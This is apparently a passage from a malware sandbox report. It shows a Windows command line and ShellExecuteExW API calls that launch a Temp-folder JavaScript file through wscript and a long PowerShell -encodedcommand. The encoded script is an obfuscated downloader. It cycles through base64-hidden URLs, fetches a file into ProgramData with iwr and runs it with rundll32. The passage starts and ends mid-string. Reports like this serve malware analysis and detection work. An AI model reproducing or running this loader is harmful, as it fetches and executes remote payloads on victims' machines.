gAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBKAEEARwAwAEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHMAQQBHAFUAQQBMAGcAQgBzAEEARwBFAEEAYgBnAEIAawBBAEEAPQA9AEkAPQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAawBBAEcAVQBBAFkAdwBCAGgAQQBIAFEAQQBlAFEAQgBzAEEARgBNAEEAZABRAEIAaQBBAEgAWQBBAGIAdwBCAGoAQQBHAEUAQQBiAEEAQQB1AEEARwBNAEEAWQB3AEEAPQAiADsA"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAHUAcgBvAGMAaABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMgBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQAUQBBAE0AQQBBAD0AcwBmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCADMAQQBHAEUAQQBiAEEAQgBzAEEARwA4AEEAZAB3AEIAVwBBAEcAawBBAFkAUQBCAHUAQQBHAFEAQQBaAFEAQgB5AEEAQwA0AEEAYwBnAEIAbABBAEgAQQBBAFkAUQBCAHAAQQBIAEkAQQAiADsAJABEAGkAZwByAGUAcwBzAGkAbwBuAGEAcgB5AEEAbgBvAHAAbABhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgB3AEIAeQBBAEcAVQBBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAdQBBAEgAUQBBAGIAdwBCAGsAQQBHAEUAQQBlAFEAQQA9AEoARABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgBqAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBkAFEAQgB5AEEARwBjAEEAWgBRAEIAeQBBAEgAawBBACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABwAHUAcABpAGwAbABhAGcAZQBHAGkAZwBhAG4AdABpAGMAaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABFAEEATwBBAEEAeQBBAEMANABBAE8AUQBBADEAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABNAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABJAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHkAQQBEAE0AQQBOAFEAQQB1AEEARABJAEEATgBRAEEAeQBBAEEAPQA9ACIAOwAkAE0AaQBjAHIAbwBjAGgAZQBtAGkAYwBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBqAEEARwBnAEEAWQBRAEIAeQBBAEcAYwBBAFoAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWQB3AEIAaABBAEgATQBBAGEAUQBCAHUAQQBHADgAQQB6AFIAUwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA1AEEAQwA0AEEATQBRAEEANQBBAEQASQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEEAPQA9ACIAOwAkAFQAcgBlAG0AZQBuAGQAbwB1AHMAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBoAEEARgBRAEEAYQBRAEIAdQBBAEcAWQBBAGQAUQBCAHMAQQBDADQAQQBZAGcAQgAxAEEARwBrAEEAYgBBAEIAawBBAEEAPQA9AHIAQwBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEAeQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9ACIAOwAkAHgAZQBuAG8AYwByAHkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEATABnAEEAeABBAEQASQBBAE4AQQBBAHYAQQBIAEEAQQBUAGcAQgBZAEEARgBrAEEATAB3AEIAeQBBAEQARQBBAFYAQQBCAG0AQQBHAGMAQQBiAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE4AQQBBAHYAQQBIAEkAQQBRAFEAQgBCAEEARQA4AEEAZABRAEIAMgBBAEQAWQBBAEwAdwBBAHcAQQBHADgAQQBhAGcAQgA1AEEARwBZAEEAVgBnAEIAVABBAEEAPQA9AGIAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB2AEEARABJAEEAYQB3AEIAVgBBAEYAawBBAE0AUQBCAEcAQQBDADgAQQBaAFEAQgBJAEEASABjAEEAYQBRAEIAawBBAEcANABBAFEAdwBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcgBhAHMAaABlAHMAVAByAGEAbgBzAGwAdQBjAGUAbgBjAGkAZQBzACAAaQBuACAAJAB4AGUAbgBvAGMAcgB5AHMAdABpAGMAIAAtAHMAcABsAGkAdAAgACIAYgBSACIAKQAgAHsAJABmAGEAcgByAGkAcwBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAGIAdwBCADIAQQBHAEUAQQBaAHcAQgBsAEEASABNAEEATABnAEIAbwBBAEcARQBBAGIAUQBCAGkAQQBIAFUAQQBjAGcAQgBuAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFMAbwBwAGgAaQBzAHQAaQBjAGEAbABsAHkAVQBuAGcAdQBhAHIAYQBuAHQAZQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEASABJAEEAWgBRAEIAegBBAEcARQBBAEwAZwBCADEAQQBIAE0AQQB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAFUAQQBNAHcAQQB1AEEARABZAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBADIAQQBBAD0APQAiADsAJABnAHIAYQB2AGUAZwBhAHIAdABoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBzAEEARwBVAEEAZABnAEIAbABBAEcAdwBBAGIAUQBCAGgAQQBHADQAQQBVAHcAQgB3AEEARwBFAEEAWgBBAEIAcABBAEgAZwBBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBsAEEARwA4AEEAeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBPAEEAQQB1AEEARABJAEEATgBBAEEAegBBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBFAEEAWgBBAEIAaABBAEgAQQBBAGQAQQBCAHAAQQBIAFkAQQBaAFEAQgBzAEEASABrAEEAVgBnAEIAcABBAEcAOABBAGIAQQBCAGwAQQBHADQAQQBZAHcAQgBsAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBjAGcAQgAxAEEARwBZAEEAWgBnAEIAcwBBAEcAVQBBAFoAQQBCAEUAQQBHAG8AQQBaAFEAQgBpAEEARwBVAEEAYgBBAEIAegBBAEMANABBAGQAQQBCAHYAQQBIAGsAQQBjAHcAQQA9ACIAOwAkAHIAZQBtAGUAbQBiAHIAYQBuAGMAZQBBAGwAZQB4AGEAbgBkAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAGQAZwBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEATABnAEIAbABBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBaAFEAQQA9ACIAOwAkAG0AYQBuAGcAYQBuAG8AcABoAHkAbABsAGkAdABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQBzAGgAZQBzAFQAcgBhAG4AcwBsAHUAYwBlAG4AYwBpAGUAcwApACkAOwBpAHcAcgAgACQAbQBhAG4AZwBhAG4AbwBwAGgAeQBsAGwAaQB0AGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwA7ACQAYwBhAHIAYQBzAHMAbwB3AHMAUwB1AGIAZAB1AGUAZABuAGUAcwBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYgBRAEIAdgBBAEcAOABBAFkAdwBCAG8AQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYgBRAEIAbABBAEgATQBBAFkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBPAFEAQQB1AEEARABZAEEATwBBAEEAdQBBAEQARQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB5AEEARABRAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANgA2ADMAMwAzACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwB3AEEAYQBRAEIAMABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgB6AEEARQAwAEEAYgB3AEIAdQBBAEcAYwBBAGIAdwBCAHYAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYwB3AEIAMQBBAEcASQBBAGQAQQBCAHkAQQBHADgAQQBZAHcAQgBvAEEARwBFAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHAAQQBHAE0AQQBMAEEAQgBVAEEARwBVAEEAYwB3AEIAMABBAEQAcwBBAFIAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEIAcQBBAEgATQBBACIAOwAkAGYAbwByAGUAZABlAHMAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE0AZwBBAHkAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQBFAHgAcAByAGUAcwBzAGoAcwA7AH0AIABjAGEAdABjAGgAIAB7ACQASAB5AGEAbAB1AHIAbwBuAGkAYwBPAGYAZgBsAG8AYQBkAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAGcAQgBtAEEARwB3AEEAYgB3AEIAMwBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBjAHcAQgBoAEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHcAQQBHAGsAQQBiAGcAQgBuAEEARwB3AEEAWgBRAEIAVABBAEcARQBBAGIAQQBCAHAAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAaABBAEMANABBAFoAZwBCADEAQQBIAFEAQQBZAGcAQgB2AEEARwB3AEEAcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBZAFEAQgB5AEEARwBrAEEAZABBAEIAaABBAEcAYwBBAFoAUQBBAHUAQQBHADAAQQBiAHcAQgB0AEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB1AEEARwBZAEEAWgBRAEIAegBBAEgATQBBAFoAUQBCAHkAQQBFAEkAQQBZAFEAQgB1AEEARwBzAEEAYwB3AEIAcABBAEcARQBBAGMAdwBBAHUAQQBHAEkAQQBZAFEAQgA1AEEARwBVAEEAYwBnAEIAdQBBAEEAPQA9ACIAOwAkAHIAZQBjAHUAZQBpAGwAbABlAG0AZQBuAHQAUAByAG8AcwBwAGUAYwB0AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHkAQQBEAEEAQQBMAGcAQQAyAEEARABFAEEATABnAEEAeABBAEQAawBBAE4AQQBBAD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATwBRAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATwBRAEEAPQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAGkAQQBIAEkAQQBhAFEAQgB1AEEARwBFAEEAZABBAEIAbABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgBsAEEASABJAEEATABnAEIAagBBAEcAOABBACIAOwB9AH0AJABTAHUAYwBjAG8AdQByAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAGwAQQBIAE0AQQBhAFEAQgB6AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFoAUQBCAHUAQQBHAFEAQQBZAFEAQgBrAEEARwA4AEEAYwBnAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBBAEEANQBBAEMANABBAE8AQQBBADMAQQBDADQAQQBNAFEAQQB4AEEARABBAEEATABnAEEAeABBAEQAVQBBAE0AUQBBAD0AdwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB1AEEARwBVAEEAWQBRAEIAcwBBAEcAOABBAFoAdwBCAHAAQQBHAE0AQQBVAHcAQgBvAEEARwA4AEEAZAB3AEIAaQBBAEcAOABBAFkAUQBCADAAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AIgA7ACQAQgByAGEAaQBuAHcAYQBzAGgAZQByAHMAUAByAGUAYwBvAG4AZABlAG0AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBnAEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATABnAEEAeQBBAEQATQBBAE0AdwBBAD0ASQA9AG0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBKAEEARwAwAEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHMAQQBHAFUAQQBMAGcAQgBzAEEARwBFAEEAYgBnAEIAawBBAEEAPQA9AEkAPQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAawBBAEcAVQBBAFkAdwBCAGgAQQBIAFEAQQBlAFEAQgBzAEEARgBNAEEAZABRAEIAaQBBAEgAWQBBAGIAdwBCAGoAQQBHAEUAQQBiAEEAQQB1AEEARwBNAEEAWQB3AEEAPQAiADsA"
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: wscript
parameters: "C:\Users\test22\AppData\Local\Temp\Icuv.js" kickup ostracophorousVoleries
filepath: wscript
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -encodedcommand "JABBAHUAcgBvAGMAaABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMgBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQAUQBBAE0AQQBBAD0AcwBmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCADMAQQBHAEUAQQBiAEEAQgBzAEEARwA4AEEAZAB3AEIAVwBBAEcAawBBAFkAUQBCAHUAQQBHAFEAQQBaAFEAQgB5AEEAQwA0AEEAYwBnAEIAbABBAEgAQQBBAFkAUQBCAHAAQQBIAEkAQQAiADsAJABEAGkAZwByAGUAcwBzAGkAbwBuAGEAcgB5AEEAbgBvAHAAbABhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgB3AEIAeQBBAEcAVQBBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAdQBBAEgAUQBBAGIAdwBCAGsAQQBHAEUAQQBlAFEAQQA9AEoARABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgBqAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBkAFEAQgB5AEEARwBjAEEAWgBRAEIAeQBBAEgAawBBACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABwAHUAcABpAGwAbABhAGcAZQBHAGkAZwBhAG4AdABpAGMAaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABFAEEATwBBAEEAeQBBAEMANABBAE8AUQBBADEAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABNAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABJAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHkAQQBEAE0AQQBOAFEAQQB1AEEARABJAEEATgBRAEEAeQBBAEEAPQA9ACIAOwAkAE0AaQBjAHIAbwBjAGgAZQBtAGkAYwBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBqAEEARwBnAEEAWQBRAEIAeQBBAEcAYwBBAFoAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWQB3AEIAaABBAEgATQBBAGEAUQBCAHUAQQBHADgAQQB6AFIAUwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA1AEEAQwA0AEEATQBRAEEANQBBAEQASQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEEAPQA9ACIAOwAkAFQAcgBlAG0AZQBuAGQAbwB1AHMAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBoAEEARgBRAEEAYQBRAEIAdQBBAEcAWQBBAGQAUQBCAHMAQQBDADQAQQBZAGcAQgAxAEEARwBrAEEAYgBBAEIAawBBAEEAPQA9AHIAQwBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEAeQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9ACIAOwAkAHgAZQBuAG8AYwByAHkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEATABnAEEAeABBAEQASQBBAE4AQQBBAHYAQQBIAEEAQQBUAGcAQgBZAEEARgBrAEEATAB3AEIAeQBBAEQARQBBAFYAQQBCAG0AQQBHAGMAQQBiAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE4AQQBBAHYAQQBIAEkAQQBRAFEAQgBCAEEARQA4AEEAZABRAEIAMgBBAEQAWQBBAEwAdwBBAHcAQQBHADgAQQBhAGcAQgA1AEEARwBZAEEAVgBnAEIAVABBAEEAPQA9AGIAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB2AEEARABJAEEAYQB3AEIAVgBBAEYAawBBAE0AUQBCAEcAQQBDADgAQQBaAFEAQgBJAEEASABjAEEAYQBRAEIAawBBAEcANABBAFEAdwBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcgBhAHMAaABlAHMAVAByAGEAbgBzAGwAdQBjAGUAbgBjAGkAZQBzACAAaQBuACAAJAB4AGUAbgBvAGMAcgB5AHMAdABpAGMAIAAtAHMAcABsAGkAdAAgACIAYgBSACIAKQAgAHsAJABmAGEAcgByAGkAcwBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAGIAdwBCADIAQQBHAEUAQQBaAHcAQgBsAEEASABNAEEATABnAEIAbwBBAEcARQBBAGIAUQBCAGkAQQBIAFUAQQBjAGcAQgBuAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFMAbwBwAGgAaQBzAHQAaQBjAGEAbABsAHkAVQBuAGcAdQBhAHIAYQBuAHQAZQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEASABJAEEAWgBRAEIAegBBAEcARQBBAEwAZwBCADEAQQBIAE0AQQB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAFUAQQBNAHcAQQB1AEEARABZAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBADIAQQBBAD0APQAiADsAJABnAHIAYQB2AGUAZwBhAHIAdABoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBzAEEARwBVAEEAZABnAEIAbABBAEcAdwBBAGIAUQBCAGgAQQBHADQAQQBVAHcAQgB3AEEARwBFAEEAWgBBAEIAcABBAEgAZwBBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBsAEEARwA4AEEAeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBPAEEAQQB1AEEARABJAEEATgBBAEEAegBBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBFAEEAWgBBAEIAaABBAEgAQQBBAGQAQQBCAHAAQQBIAFkAQQBaAFEAQgBzAEEASABrAEEAVgBnAEIAcABBAEcAOABBAGIAQQBCAGwAQQBHADQAQQBZAHcAQgBsAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBjAGcAQgAxAEEARwBZAEEAWgBnAEIAcwBBAEcAVQBBAFoAQQBCAEUAQQBHAG8AQQBaAFEAQgBpAEEARwBVAEEAYgBBAEIAegBBAEMANABBAGQAQQBCAHYAQQBIAGsAQQBjAHcAQQA9ACIAOwAkAHIAZQBtAGUAbQBiAHIAYQBuAGMAZQBBAGwAZQB4AGEAbgBkAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAGQAZwBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEATABnAEIAbABBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBaAFEAQQA9ACIAOwAkAG0AYQBuAGcAYQBuAG8AcABoAHkAbABsAGkAdABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQBzAGgAZQBzAFQAcgBhAG4AcwBsAHUAYwBlAG4AYwBpAGUAcwApACkAOwBpAHcAcgAgACQAbQBhAG4AZwBhAG4AbwBwAGgAeQBsAGwAaQB0AGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAb